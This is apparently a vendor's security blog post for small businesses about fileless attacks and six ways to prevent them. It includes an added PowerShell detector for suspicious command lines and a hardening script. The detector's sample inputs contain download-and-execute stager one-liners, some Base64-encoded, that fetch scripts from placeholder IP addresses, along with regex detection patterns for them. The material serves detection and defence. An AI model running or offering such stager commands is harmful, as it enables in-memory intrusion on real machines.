What are fileless attacks? [Plus: 6 prevention strategies]

Editorial Team


As a small business owner in a hyperconnected world, you may be familiar with how traditional phishing and malware scams work:

  • Unsuspecting employees or customers click on suspicious links.
  • In doing so, they unknowingly download a piece of malicious code.
  • Once installed, that code takes over the users’ computers.
  • The code’s creator then has access to whatever that user can reach: local files, saved credentials, and often the rest of the network.

This type of malware is a very real threat for consumers and businesses alike. However, because the malicious code is written to disk, signature-based antivirus software and the operating system’s built-in protections have a file to scan and can often detect the intrusion. Consequently, file-based phishing attacks tend to be most successful against computers that either lack antivirus protection or run outdated, unpatched operating systems.

Within the last several years, a different type of threat has emerged that has security experts concerned. Known as a “fileless attack,” it is often delivered through the same kind of phishing email, but the payload doesn’t install software on the user’s hard drive. Instead, it hijacks legitimate programs that already exist on the machine, essentially turning the computer against itself.

If the computers in your business are networked, the potential consequences could be catastrophic, with criminals gaining access to all your data and your customers’ data, too. This guide explains what fileless attacks are, why they’re dangerous, and how to help prevent fileless malware attacks from negatively impacting your small business.

How do fileless attacks work?

Also known as “zero-footprint” or “non-malware” attacks, this class of attack is much harder to detect, precisely because no malicious file is downloaded to or installed on the disk. (“Zero-footprint” is a slight exaggeration: the code still occupies memory while it runs, and many fileless campaigns stash a small loader in the Windows registry, the WMI repository, or a scheduled task so that they survive a reboot. Those traces are where investigators look.)

In most cases, the process works as follows:

  • An unsuspecting user clicks on a suspicious link.
  • The user is redirected to a website that exploits a vulnerability in the browser or in one of its plug-ins. Adobe Flash was a favorite target until it was retired at the end of 2020.
  • The exploit launches a legitimate tool that is already on the machine, typically Windows PowerShell, and hands it instructions: usually a short command that fetches a script over the network and runs it directly in the computer’s memory (RAM). Nothing is written to the physical hard drive.

The attacker can then read or intercept information sent or received through that computer and, if the compromised user is a local administrator (or the attacker finds a way to escalate privileges), carry out admin-level actions as well.
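To a defender, the chain above shows up as a PowerShell process launched with a telltale combination of switches: a hidden window, no profile, execution policy bypass, and a download-and-execute one-liner, often hidden behind -EncodedCommand. The following is an added example, not code from the original article, that scans process command lines for those indicators and decodes any -EncodedCommand payload so it can be inspected as well. The four sample command lines at the bottom are constructed for illustration, with addresses from the documentation IP ranges; on a real system you would feed it command lines from Windows Security event 4688 (with command-line auditing enabled) or Sysmon event 1. Requiring two indicators before flagging is a design choice so that a single encoded or unattended admin script does not trip it on its own.

```powershell
# Added example (not from the original article): flag PowerShell command lines that look like
# the in-memory download-and-execute stage of a fileless attack. Input lines are constructed
# samples; in production, pipe in command lines from event 4688 or Sysmon event 1.

function Test-SuspiciousPowerShellCommandLine {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$CommandLine
    )
    process {
        $reasons = [System.Collections.Generic.List[string]]::new()

        # Switches and calls that are routinely combined in fileless "stager" one-liners.
        # -match is case-insensitive by default, so no (?i) is needed.
        if ($CommandLine -match '(?:-|/)(?:w|win|windowstyle)\s+hidden')     { $reasons.Add('hidden window') }
        if ($CommandLine -match '(?:-|/)(?:nop|noprofile)\b')                 { $reasons.Add('-NoProfile') }
        if ($CommandLine -match '(?:-|/)(?:ep|executionpolicy)\s+bypass')     { $reasons.Add('execution policy bypass') }
        if ($CommandLine -match '\b(?:iex|invoke-expression)\b')              { $reasons.Add('Invoke-Expression') }
        if ($CommandLine -match 'downloadstring|downloaddata|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer') {
            $reasons.Add('network download')
        }
        if ($CommandLine -match '\[reflection\.assembly\]::load|system\.reflection') { $reasons.Add('reflective assembly load') }

        # -EncodedCommand hides the script as Base64(UTF-16LE). Decode it and look inside,
        # because the encoded form on its own is not proof of anything.
        if ($CommandLine -match '(?:-|/)(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})') {
            $reasons.Add('encoded command')
            try {
                $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
                if ($decoded -match '\b(?:iex|invoke-expression)\b|downloadstring|net\.webclient|invoke-webrequest') {
                    $preview = $decoded.Substring(0, [Math]::Min(60, $decoded.Length))
                    $reasons.Add("decoded payload downloads and executes: $preview")
                }
            } catch {
                $reasons.Add('encoded command (not valid Base64)')
            }
        }

        [pscustomobject]@{
            Suspicious  = ($reasons.Count -ge 2)   # two independent indicators to limit noise
            Reasons     = ($reasons -join '; ')
            CommandLine = $CommandLine
        }
    }
}

# Constructed sample command lines: two typical stagers, one encoded but benign admin
# command (encoding alone must not be treated as malicious), and one ordinary script run.
$benign  = 'Get-Service -Name Spooler'
$stager  = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.5/x")'
$samples = @(
    'powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''http://198.51.100.10/a.ps1'')"',
    'powershell.exe -NoProfile -EncodedCommand ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stager)),
    'powershell.exe -EncodedCommand ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($benign)),
    'powershell.exe -File C:\Scripts\Backup.ps1'
)

$results = $samples | Test-SuspiciousPowerShellCommandLine
$results | Format-Table Suspicious, Reasons -AutoSize

# The flagged subset is what you would forward to an alert or ticket.
$results | Where-Object Suspicious | Select-Object -ExpandProperty CommandLine
```

Run as-is in Windows PowerShell 5.1 or PowerShell 7: the first two samples are flagged, the encoded Get-Service call and the plain script run are not. The same regexes work equally well over the decoded script text that script block logging (event ID 4104) records, which is the more reliable source once it is switched on.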

Fileless malware examples (that don’t use Flash)

You might be thinking, “No problem. Our organization doesn’t ever use Flash.” 

But, not so fast. There are many fileless malware examples in which criminals got in through browser vulnerabilities, Office macros, Windows Management Instrumentation (WMI), and countless other tools that were already installed on the victim’s machine.

No matter what entry point is used, the underlying threat remains the same. Fileless attacks hijack legitimate software programs that have already been installed on the user’s machine.

Because the malicious code exists only in the computer’s memory, there aren’t any suspicious or foreign files to raise alarms with signature-based antivirus software. Fileless attacks also sidestep application whitelisting (now usually called allowlisting), the control by which administrators approve which programs are allowed to run: PowerShell, WMI, and Office are on the approved list, so code that runs inside them is, by default, approved too.

To make matters worse, a fileless attack on one machine can become a foothold for reaching every other computer on the network. Once the attacker holds a user’s credentials, the same built-in remote-administration tools that IT staff rely on (remote PowerShell, WMI, shared drives) can carry the attack to computers on the same Wi-Fi network or the same storage servers. So, even if you’re diligent about not clicking on suspicious links, you’re not necessarily safe: if a family member or colleague gets hit by a fileless attack, your machine can be next.

Fileless attack detection and prevention strategies

One of the reasons security experts are so concerned about fileless attacks is that they can be incredibly effective:

  • In the absence of locally-stored files, detecting new fileless malware is very difficult.
  • Once a single networked computer is infected, the damage can quickly spread laterally to other machines. 

According to the Ponemon Institute, fileless attacks are 10 times more likely to succeed than are their file-based counterparts. In 2020 alone, the number of fileless attacks grew by a staggering 900%.

Compounding the issue, defenses have not fully caught up with this persistent threat. Traditional signature-based antivirus has little to scan; newer endpoint detection and response (EDR) tools and Windows features such as PowerShell script logging and the Antimalware Scan Interface (AMSI) help, but they are not universally deployed or correctly configured. However, there are some common-sense strategies you can implement to help improve cyber security and make your business a less attractive target.

1. Don’t click on suspicious links

This fileless malware protection tip is easy to state and hard to follow: “suspicious” links look less suspicious every year. Criminals know how to dress up their emails, websites, and text messages to look like legitimate pieces of communication.

Case in point: If someone sent you this article with the subject line “Common Fileless Malware Examples and How to Stop Them” — you might click on it.

Now imagine that a hacker sent you the same message and subject line — but instead of bringing you here, the embedded link took you to a strange website.

2. Keep your devices up-to-date

Always use the latest version of whatever operating system is available for your devices, and install all patches and updates when prompted. Apply the same rule to browsers, browser plug-ins, and Office: the entry point for a fileless attack is usually a bug in one of those rather than in Windows itself. If a plug-in such as Flash is no longer supported, remove it rather than leaving an unpatched copy behind.

3. Disable non-essential tools

If you’re on a Windows machine, the prime targets are PowerShell, Windows Management Instrumentation (WMI), and Office macros. All three are legitimate features provided by Microsoft, which is exactly why attackers lean on them: they are trusted, already installed, and rarely logged. Disable whatever your organization genuinely doesn’t use, but be realistic about what can go. Office macros can usually be blocked outright, or at minimum for documents that arrived from the internet. PowerShell itself often has to stay for administration, but the legacy PowerShell 2.0 engine can be removed and script logging switched on so that anything it runs is recorded. WMI cannot be removed, because Windows depends on it; the practical step is to block remote access to it on workstations and watch for unusual use.
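The following added example, not code from the original article, applies those settings on a single Windows 10 or 11 machine. The registry paths are the documented Group Policy locations for PowerShell logging and for the Office “block macros from the internet” setting (Office version 16.0 is assumed; the firewall rule group name is the default one Windows ships). It does not disable PowerShell or WMI outright, for the reasons given above. Run it elevated, test it on one machine first, and use Group Policy or your endpoint management tool to roll it out fleet-wide.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the original article): harden the Windows tools that fileless
# attacks abuse, without removing the ones administrators still need. Assumes Windows 10/11
# client and Office 16.0 (2016/2019/365); verify paths for other versions before use.

function Set-PolicyDword {
    # Create the policy key if it is missing and write a REG_DWORD value.
    param([string]$Path, [string]$Name, [int]$Value)
    if (-not (Test-Path -LiteralPath $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -LiteralPath $Path -Name $Name -Value $Value -PropertyType DWord -Force | Out-Null
}

# 1. Remove the legacy PowerShell 2.0 engine. It predates script block logging and the
#    Antimalware Scan Interface (AMSI), so "powershell -Version 2" is a classic way to dodge both.
foreach ($feature in 'MicrosoftWindowsPowerShellV2', 'MicrosoftWindowsPowerShellV2Root') {
    $f = Get-WindowsOptionalFeature -Online -FeatureName $feature -ErrorAction SilentlyContinue
    if ($f -and $f.State -eq 'Enabled') {
        Disable-WindowsOptionalFeature -Online -FeatureName $feature -NoRestart | Out-Null
    }
}

# 2. Log what PowerShell actually executes. Script block logging records the de-obfuscated
#    content of every script block (event ID 4104 in Microsoft-Windows-PowerShell/Operational),
#    including the decoded text of -EncodedCommand and scripts pulled from the network.
$psPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
Set-PolicyDword "$psPolicy\ScriptBlockLogging" 'EnableScriptBlockLogging' 1
Set-PolicyDword "$psPolicy\ModuleLogging"      'EnableModuleLogging'      1
$moduleNames = "$psPolicy\ModuleLogging\ModuleNames"
if (-not (Test-Path -LiteralPath $moduleNames)) { New-Item -Path $moduleNames -Force | Out-Null }
New-ItemProperty -LiteralPath $moduleNames -Name '*' -Value '*' -PropertyType String -Force | Out-Null

# 3. Block macros in Office documents that carry the Mark-of-the-Web (downloaded from the
#    internet or received as an attachment). These are per-user policy keys; set the same
#    values through Group Policy to cover every user on the machine.
foreach ($app in 'Word', 'Excel', 'PowerPoint') {
    Set-PolicyDword "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security" 'blockcontentexecutionfrominternet' 1
}

# 4. WMI cannot be disabled (Windows depends on it). Instead, keep the inbound remote-WMI
#    firewall rules off on workstations so an attacker cannot use WMI to hop between them.
$wmiGroup = 'Windows Management Instrumentation (WMI)'
Get-NetFirewallRule -DisplayGroup $wmiGroup -Direction Inbound -ErrorAction SilentlyContinue |
    Disable-NetFirewallRule

# Report the resulting state so the change can be verified or fed to an inventory tool.
[pscustomobject]@{
    PowerShellV2Engine = (Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue).State
    ScriptBlockLogging = (Get-ItemProperty -LiteralPath "$psPolicy\ScriptBlockLogging").EnableScriptBlockLogging
    WordMacrosBlocked  = (Get-ItemProperty -LiteralPath 'HKCU:\Software\Policies\Microsoft\Office\16.0\Word\Security').blockcontentexecutionfrominternet
    InboundWmiRulesOn  = @(Get-NetFirewallRule -DisplayGroup $wmiGroup -Direction Inbound -ErrorAction SilentlyContinue |
                           Where-Object { $_.Enabled -eq 'True' }).Count
}
```

Two caveats a practitioner would add: script block logging is only useful if someone collects and reads the PowerShell/Operational log (forward it to whatever central logging you have), and the macro setting blocks internet-sourced macros only, so a document copied in from a USB stick is still governed by the user’s ordinary macro warning settings.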

4. Monitor your network’s traffic

This step has less to do with fileless malware protection and more to do with detection. Monitor your network’s activity for sudden spikes in traffic that your team can’t account for, and for connections that shouldn’t exist at all, such as a workstation’s PowerShell process reaching out to an unfamiliar server. Those blips can indicate that someone has unauthorized access to one of your organization’s machines: even a fileless attack usually has to fetch its script from the internet and report back to the attacker, and that traffic is visible on the network even though nothing touches the disk.

5. Implement the ‘principle of least privilege’

You should restrict every employee’s access rights to follow the “principle of least privilege”: each user (and each program) gets only the permissions needed for the job, and data is accessed on a need-to-know basis. Lower-level staffers, for example, don’t need administrative privileges if they’re only doing data entry. This matters for fileless attacks in particular, because a hijacked PowerShell session runs with whatever rights the logged-in user has: a standard user account limits the damage, while a local administrator account hands the attacker the whole machine.

6. Consider third-party solutions

Although traditional signature-based antivirus programs aren’t very good at detecting or preventing fileless attacks, a growing number of third-party providers offer endpoint detection and response (EDR) products that watch process behavior, scripts, and memory rather than files. Do your research, and ask a vendor specifically how their product handles in-memory and script-based attacks before you buy.

A final fileless malware protection tip

Fileless attacks are hard to detect, prevent, and contain. This is especially true if you lack the IT and security know-how to:

  • Monitor network traffic
  • Assign admin roles
  • Disable non-essential functions

Although no single operating system is 100% immune from fileless attacks, implementing the tips above can help minimize your risk. To learn more about how Clover helps protect its merchants from cyber fraud, contact a Business Consultant today.
